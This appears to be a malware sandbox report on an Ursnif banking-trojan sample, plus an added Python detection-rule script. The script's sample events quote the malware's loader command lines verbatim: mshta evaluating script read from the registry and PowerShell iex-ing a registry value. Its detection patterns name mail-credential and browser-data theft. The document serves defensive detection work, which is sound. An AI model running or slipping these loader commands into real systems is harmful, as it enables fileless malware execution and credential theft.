Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
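The execution chain listed under "Creates a process in suspended mode" (mshta evaluating script read back from the registry, PowerShell iex-ing a registry value, ping used as a sleep, nslookup of myip.opendns.com) and the explorer.exe reads of mail-profile keys and Chrome cache files listed above are the pieces of this report a detection engineer would turn into rules. The following is an added example written for this page; it is not code from the sandbox vendor, the report's signatures or the malware. It runs a small rule set over events constructed from the command lines and paths on this page. The Event and Hit classes, the rule names and the 200-character long-command-line threshold are assumptions of this example (the report does not state what threshold its own signature uses); the registry rule matches any GUID under Software\AppDataLow\Software\Microsoft, not only this sample's, so it generalises beyond the one key seen here.

```python
"""Detection rules for the Ursnif/Gozi execution chain shown in this report.

Added example for this page; not code from the sandbox vendor or the malware.
Events are constructed from the command lines and paths listed on the page;
rule names and thresholds are this example's own assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str           # "process", "file" or "registry"
    image: str          # process that performed the action
    parent: str = ""    # parent image (process events only)
    cmdline: str = ""   # full command line (process events only)
    target: str = ""    # file path or registry key (file/registry events)


@dataclass
class Hit:
    rule: str
    event: Event


def _name(path: str) -> str:
    """Lower-cased basename of an image path, e.g. 'PING.EXE' -> 'ping.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LONG_CMDLINE = 200  # assumed threshold; the report does not state its own

# Ursnif keeps its stage/config under HKCU\Software\AppDataLow\Software\Microsoft\{GUID};
# match any GUID there, not just this sample's. Backslash count varies between the
# HTA (escaped, "\\") and the PowerShell ("\") command lines, hence "\\+".
APPDATALOW_RE = re.compile(
    r"software\\+appdatalow\\+software\\+microsoft\\+[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)
GP_HKCU_RE = re.compile(r"(get-itemproperty|\bgp\b)\s+\"?hkcu:", re.I)
PING_SLEEP_RE = re.compile(
    r"\b(localhost|127\.0\.0\.1)\b.*-n\s+\d+|-n\s+\d+.*\b(localhost|127\.0\.0\.1)\b", re.I)
MAIL_KEY_RE = re.compile(r"\\(windows live mail|windows messaging subsystem\\profiles)", re.I)
BROWSER_DATA_RE = re.compile(r"\\chrome\\user data|\\mozilla\\firefox\\profiles", re.I)


def _proc(e: Event, image: str) -> bool:
    return e.kind == "process" and _name(e.image) == image


# (rule name, predicate). Each predicate uses only fields a Sysmon/EDR
# process-creation, file-access or registry-access event already carries.
RULES = [
    ("mshta_inline_hta_regread",
     lambda e: _proc(e, "mshta.exe")
     and "about:<hta:application>" in e.cmdline.lower()
     and ".regread(" in e.cmdline.lower()),
    ("mshta_spawns_shell",
     lambda e: e.kind == "process" and _name(e.parent) == "mshta.exe" and _name(e.image) in SHELLS),
    ("powershell_iex_from_registry",
     lambda e: _proc(e, "powershell.exe") and IEX_RE.search(e.cmdline) and GP_HKCU_RE.search(e.cmdline)),
    ("ursnif_appdatalow_key",
     lambda e: APPDATALOW_RE.search(e.cmdline + " " + e.target)),
    ("ping_as_sleep",
     lambda e: _proc(e, "ping.exe") and PING_SLEEP_RE.search(e.cmdline)),
    ("external_ip_lookup_nslookup",
     lambda e: _proc(e, "nslookup.exe") and "myip.opendns.com" in e.cmdline.lower()),
    ("very_long_cmdline",
     lambda e: e.kind == "process" and len(e.cmdline) > LONG_CMDLINE),
    ("explorer_reads_mail_profile",
     lambda e: e.kind == "registry" and _name(e.image) == "explorer.exe" and MAIL_KEY_RE.search(e.target)),
    ("explorer_reads_browser_data",
     lambda e: e.kind == "file" and _name(e.image) == "explorer.exe" and BROWSER_DATA_RE.search(e.target)),
]


def analyze(events):
    """Run every rule over every event; return the list of Hit objects."""
    return [Hit(rule, e) for e in events for rule, pred in RULES if pred(e)]


def summarize(hits):
    """Map rule name -> sorted list of image basenames that triggered it."""
    out = {}
    for h in hits:
        out.setdefault(h.rule, []).append(_name(h.event.image))
    return {rule: sorted(names) for rule, names in out.items()}


# Constructed from the report's process-creation and access lines, plus one benign event.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\control.exe", r"C:\Users\user\Desktop\FpYf5EGDO9.exe",
          r"C:\Windows\system32\control.exe -h"),
    Event("process", r"C:\Windows\System32\mshta.exe", "unknown",
          r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\mshta.exe",
          r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    Event("process", r"C:\Windows\System32\PING.EXE", r"C:\Windows\System32\cmd.exe", "ping localhost -n 5"),
    Event("process", r"C:\Windows\System32\nslookup.exe", r"C:\Windows\System32\cmd.exe",
          "nslookup myip.opendns.com resolver1.opendns.com"),
    Event("registry", r"C:\Windows\explorer.exe", target=r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail"),
    Event("file", r"C:\Windows\explorer.exe",
          target=r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index"),
    Event("process", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),  # benign
]

if __name__ == "__main__":
    for rule, images in summarize(analyze(SAMPLE_EVENTS)).items():
        print(f"{rule:32} {', '.join(images)}")
```

The two rules worth keeping even after this campaign's GUID and domain change are ursnif_appdatalow_key (the storage location, not the value name, is the stable part) and mshta_spawns_shell; the inline-HTA and iex-from-registry rules will fire on any fileless loader that uses the same trick, so expect to tune them against legitimate administrative scripts rather than to retire them.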

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: identical to the matches listed under Stealing of Sensitive Information above (same memory dumps, process memory spaces and unpacked PEs)